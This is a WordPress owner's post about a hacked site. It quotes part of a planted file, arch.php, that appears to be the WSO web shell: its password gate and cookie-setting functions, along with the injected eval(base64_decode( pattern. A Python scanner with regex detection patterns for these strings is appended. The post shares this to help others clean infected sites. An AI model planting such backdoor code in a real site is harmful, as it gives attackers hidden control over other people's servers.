WordPress hacked with a strange file hidden in the includes folder
I recently found out that my site was hacked and went through various steps but it still kept adding eval(base64_decode( junk in my wp-config.php file. It also included ___DATADIRipconfig.bin and folders that kept being uploaded on a daily basis.
Today I found this scary-looking file after spending hours trying to clean my site from being hacked. The filename is arch.php and I’ve searched everywhere but couldn’t find what the purpose of the file was, so I of course deleted it but wanted to share this bit of info with anyone else who might be going through the same thing I went through.
The file is located in: wp-includes/Text/Diff/Engine. It’s a rather large file and uses the zipfile_mod class to create files/directories with base64 characters. Below is a snippet of the code:
function wsoLogin() {
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
If it continues or if I find anything else, I’ll add more info.
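For anyone cleaning up a similar infection, here is an added example (not part of the original post) that walks a WordPress tree and reports PHP files containing the strings quoted above. The extension list, the size cap, and the sample files created in demo() are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Indicators from the post: the injected eval(base64_decode( call and names seen in arch.php.
INDICATORS = {
    "eval_base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    "wsoLogin": re.compile(rb"\bwsoLogin\b"),
    "WSOsetcookie": re.compile(rb"\bWSOsetcookie\b"),
    "zipfile_mod": re.compile(rb"\bzipfile_mod\b"),
}
PHP_EXTENSIONS = (".php", ".phtml", ".inc")  # assumption: extensions worth checking

def scan_tree(root, max_bytes=5 * 1024 * 1024):
    """Return {relative_path: [indicator names]} for PHP files under root that match."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read(max_bytes)  # cap the read on very large files
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            found = sorted(n for n, rx in INDICATORS.items() if rx.search(data))
            if found:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = found
    return hits

def demo():
    """Scan a constructed sample tree: one clean file, two carrying the post's strings."""
    with tempfile.TemporaryDirectory() as root:
        engine = os.path.join(root, "wp-includes", "Text", "Diff", "Engine")
        os.makedirs(engine)
        samples = {
            os.path.join(engine, "native.php"): b"<?php class Text_Diff_Engine_native {}\n",
            os.path.join(engine, "arch.php"): b"<?php function wsoLogin() {} function WSOsetcookie($k, $v) {}\n",
            os.path.join(root, "wp-config.php"): b"<?php eval(base64_decode('Y29uc3RydWN0ZWQ='));\n",
        }
        for path, body in samples.items():
            with open(path, "wb") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, names in sorted(demo().items()):
        print(rel, names)
```

A match on eval_base64 alone is a lead to review by hand, and a clean result does not show the site is clean, since these are only the strings from this one post.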